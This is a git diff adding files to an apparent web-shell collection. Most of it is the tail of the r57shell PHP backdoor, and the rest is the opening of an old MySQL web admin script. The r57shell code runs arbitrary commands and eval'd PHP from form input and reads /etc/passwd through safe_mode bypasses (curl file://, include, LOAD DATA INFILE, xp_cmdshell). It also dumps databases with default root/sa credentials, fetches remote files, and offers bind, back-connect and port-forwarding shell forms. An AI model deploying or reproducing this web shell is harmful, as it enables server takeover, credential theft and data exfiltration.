+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mysql_query("SHOW DATABASES", $db);
+   while(($row=@mysql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+     while(($row2=@mysql_fetch_row($res2)))
+      {
+      echo " | - ".$row2[0]."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }
+       }
+      }
+     }
+    }
+   @mysql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MySQL server";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mssql_query("sp_databases", $db);
+   while(($row=@mssql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     @mssql_select_db($row[0]);
+     $res2 = @mssql_query("sp_tables",$db);
+     while(($row2=@mssql_fetch_array($res2)))
+      {
+      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+      {
+      echo " | - ".$row2['TABLE_NAME']."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mssql_query("sp_columns ".$row2[2],$db);
+       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }
+       }
+      }
+      }
+     }
+    }
+   @mssql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+   while(($row=@pg_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+    }
+  @pg_close($db);
+  }
+ else echo "[-] ERROR! Can't connect to PostgreSQL server";
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $sqh  = "# homepage: http://\r\n";
+  $sqh .= "# ---------------------------------\r\n";
+  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";
+  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+  $sqh .= "# ---------------------------------\r\n\r\n";
+  switch($_POST['db']){
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+     $sql2 = '';
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while (($row = @mysql_fetch_assoc($res))) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MySQL server";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+  {
+   if(@mssql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MSSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+     if (@mssql_num_rows($res) > 0) {
+     while (($row = @mssql_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+    }
+   else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+     $sql1  = "# PostgreSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+     if (@pg_num_rows($res) > 0) {
+     while (($row = @pg_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+   @pg_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to PostgreSQL server";
+  break;
+  }
+ }
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></table>";
+}
+?>
\ No newline at end of file
diff --git a/138shell/S/sql.php.txt b/138shell/S/sql.php.txt
new file mode 100644
index 0000000..13cd5c8
--- /dev/null
+++ b/138shell/S/sql.php.txt
@@ -0,0 +1,1169 @@
+<?
+/*
+ * MySQL Web Interface Version 0.8
+ * -------------------------------
+ * Developed By SooMin Kim (smkim@popeye.snu.ac.kr)
+ * License : GNU Public License (GPL)
+ * Homepage : http://popeye.snu.ac.kr/~smkim/mysql
+ */
+
+$HOSTNAME = "localhost";
+
+function logon() {
+	global $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username" );
+	setcookie( "mysql_web_admin_password" );
+	echo "<html>\n";
+	echo "<head>\n";
+	echo "<title>MySQL Web Interface</title>\n";
+	echo "</head>\n";
+	echo "<body>\n";
+	echo "<table width=100% height=100%><tr><td><center>\n";
+	echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
+	echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+	echo "<h1>MySQL Web Interface</h1>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=logon_submit>\n";
+	echo "<table cellpadding=5 cellspacing=1>\n";
+	echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
+	echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
+	echo "</table><p>\n";
+	echo "<input type=submit value='Enter'>\n";
+	echo "<input type=reset value='Clear'><br>\n";
+	echo "</form>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</center></td></tr></table>\n";
+	echo "<p><hr width=300>\n";
+	echo "<font size=2>\n";
+	echo "Copyleft &copy; since 1999,\n";
+	echo "<a href='mailto:smkim76@icqmail.com'>SooMin Kim</a><br>\n";
+	echo "<a href='http://popeye.snu.ac.kr/~smkim/mysql'>Hompage<a> is available<br>";
+	echo "</font>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+function logon_submit() {
+	global $username, $password, $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username", $username );
+	setcookie( "mysql_web_admin_password", $password );
+	echo "<html>";
+	echo "<head>";
+	echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
+	echo "</head>";
+	echo "</html>";
+}
+
+function echoQueryResult() {
+	global $queryStr, $errMsg;
+
+	if( $errMsg == "" ) $errMsg = "Success";
+	if( $queryStr != "" ) {
+		echo "<table cellpadding=5>\n";
+		echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+		echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+		echo "</table><p>\n";
+	}
+}
+
+function listDatabases() {
+	global $mysqlHandle, $PHP_SELF;
+
+	echo "<h1>Database List</h1>\n";
+
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createDB>\n";
+	echo "<input type=text name=dbname>\n";
+	echo "<input type=submit value='Create Database'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	$pDB = mysql_list_dbs( $mysqlHandle );
+	$num = mysql_num_rows( $pDB );
+	for( $i = 0; $i < $num; $i++ ) {
+		$dbname = mysql_dbname( $pDB, $i );
+		echo "<tr>\n";
+		echo "<td>$dbname</td>\n";
+		echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
